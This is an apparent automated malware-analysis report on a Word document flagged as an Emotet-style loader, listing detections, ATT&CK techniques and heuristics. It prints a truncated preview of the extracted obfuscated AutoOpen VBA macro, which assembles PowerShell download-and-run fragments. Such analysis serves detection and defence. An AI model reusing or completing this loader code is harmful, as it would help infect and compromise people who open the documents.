MALICIOUS
250
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes Shell() and CreateObject() calls, indicating an attempt to download and execute a secondary payload. The presence of a ClamAV detection for 'Doc.Malware.Emodldr-6769670-0' further supports its malicious nature.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-6769670-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-6769670-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.iec.ch In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45751 bytes |
SHA-256: 44577d6f88a3fde9027101d9e2143b3b8fbf55803e553d70a73e9767f8dc0dfd |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
bdhuayks = "u" Like "o"
xgxleyrd = -25358
aeytja49 = 58819
eqrkczh = (xgxleyrd Xor aeytja49)
meundngb = 5958
auvtepi = -6107
euonr = (meundngb Xor auvtepi)
hjjcpcjgi = "$iumed"
ycgcdfvm = "qzd" Like "vrtvwgbsu7"
unuakko = -33099
ooefu6 = 45149
jiojz55 = (unuakko Xor ooefu6)
lbzeyl = -21603
thvhynxn = 42082
yufdave = (lbzeyl Or thvhynxn)
blvey10 = 17048
ymvln80 = -23503
tdktti4 = (blvey10 Or ymvln80)
beey = -7180
rsildlxps = 31238
nvupme = (beey Xor rsildlxps)
rpoaeg = Array("Fil';$sao='m")(0)
lfbbkbudx70 = "oksuuqzbwo" Like "gbxatxah"
oayz = "twerbxebsu" Like "o"
bhnepgw = -41734
hqyjrj = -49869
ewfpefhdg = (bhnepgw Xor hqyjrj)
mdzllu9 = 16793
oioa03 = 65210
aoup = (mdzllu9 Xor oioa03)
yxhae31 = 15582
uluub = 18477
yqwae = (yxhae31 Xor uluub)
psruu = "system"
ltbrsze = "root"
jgeehst = "rwcgsrnqd" Like "rmwqmnonyyag"
rdasre = psruu & ltbrsze
hesciy0 = 43780
qfoiicj5 = -6882
eshuiphy = (hesciy0 Or qfoiicj5)
ixrqyqhe = -21643
wcioisdc = -16710
yvdfeu8 = (ixrqyqhe Or wcioisdc)
djsiga = "wpwd" Like "fmetduodb"
brooubq = "dadaaxktfg" Like "md"
orxevla = "jlplgx" Like "uqdixd"
gvsverpli = "';$ayoef"
yabai = 47257
iedb10 = 63270
jjpugo = (yabai Or iedb10)
cyhqodpu26 = -10702
oqwybx = -5151
hojzu = (cyhqodpu26 Xor oqwybx)
maaew = "egl" Like "b"
oriz = -9567
jiarr = 13252
krviavxdj = (oriz Xor jiarr)
iaaoi = 12727
aaichuu = 30047
mrwhjnp = (iaaoi Xor aaichuu)
effemhi = Array("holryv07=")(0)
oiytsa9 = "qykielppnhjqa" Like "ui"
nkaudxgdi = "shaefots" Like "ielupmyby2"
mozgvm = "enwanmitmu" Like "iirdqrijtv"
hjhxvht = "y" Like "oasgyjoaeve"
oooa = "f='et-';$yd"
nmru = -28560
yyfuemn = -52217
wjtnijfb = (nmru Or yyfuemn)
cskaqv = "gaieo43" Like "e"
jqqqucgp = "ooklxhjacnsza2" Like "dontvv"
vfprto = -22282
omyeamk = 3745
uyash = (vfprto Or omyeamk)
zpleca = "yferlipk" Like "stoiesc"
vtjuu = "esf" Like "qfzomyll9"
rnlodwi3 = Array("eakk='en")(0)
geooy = 60102
udhpqrjk = 22975
reoyi = (geooy Or udhpqrjk)
kebgxff90 = "tmeszoia" Like "stqmei"
uzio = -54789
lfrueih = 25314
oacxokdhh59 = (uzio Or lfrueih)
gayy = -24234
owvy0 = -47545
aeiqwvc = (gayy Xor owvy0)
oedhfidd = "wz" Like "crhoqwkecllnln"
eicgbopmh = Environ(rdasre)
uwfou = -14226
uoyuo = -22486
diyor24 = (uwfou Or uoyuo)
vfarsoi24 = Array("ais='/wp-cont';")(0)
fouyybl3 = 31317
tzhvncu = 24249
yicdf = (fouyybl3 Xor tzhvncu)
tstmwiua = "nxfupaaa" Like "wrytatnwr"
yojcdhp = "a" Like "k"
yljmsc = "dxh" Like "ygmwoaqwu"
tuolxyj = "$woeeavn='e"
eulhyt = -46793
wscgeiu = -18653
dkzkjo = (eulhyt Or wscgeiu)
ojao = -29222
otuoob = -65925
zfvjlodg = (ojao Or otuoob)
sapmvmq = 2567
bwbnmo = 30931
xyocyy = (sapmvmq Xor bwbnmo)
irqusmj24 = "hynqhrnuakr" Like "o"
xzyqmak = -65518
yoriyh2 = 31420
tgssgiexh = (xzyqmak Or yoriyh2)
iesie = -58754
oxkqjb = -56038
ylfli62 = (iesie Or oxkqjb)
glaiwba = "\system"
mzbervu = "u" Like "dmmgcx"
ouxxhpi3 = "jvbm" Like "msqykaomh0"
ixhhe = "bfurxyanv5" Like "zplojucbo1"
iyui = 37113
hprqbpr = -22013
ootqbj1 = (iyui Or hprqbpr)
auaoult = 30989
ceei33 = 9156
idfttni = (auaoult Xor ceei33)
eicgbopmh = eicgbopmh + glaiwba
heuez = "tcswvhqsgqs" Like "xwyag"
krwnkxeq = "yuwnnwifucq" Like "yazsg"
asod = -6790
iuuj5 = 8844
imnvvae = (asod Or iuuj5)
aecax = "v07+$tp"
uwzny = "j" Like "kgoghztlvygrco0"
dwmoxxctq = 55428
ktpyom = -51836
lhjau39 = (dwmoxxctq Or ktpyom)
zjbyduo30 = "tmspwytxg" Like "aiuefcympvpn"
bneueiv = "yauvo" Like "epaj"
lvxkox94 = "auaofpymar" Like "ljoeizpbt"
ikqqakt64 = "'ent).Do';$imzooge='bject Sys'"
nesbs = "euaju" Like "iiswmfpiqwf"
fusuyc = "eaeey" Like "wyqeaoo93"
yvxtkx = "hl" Like "itlplkdnmabbt4"
winaoa = "o" Like "h
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.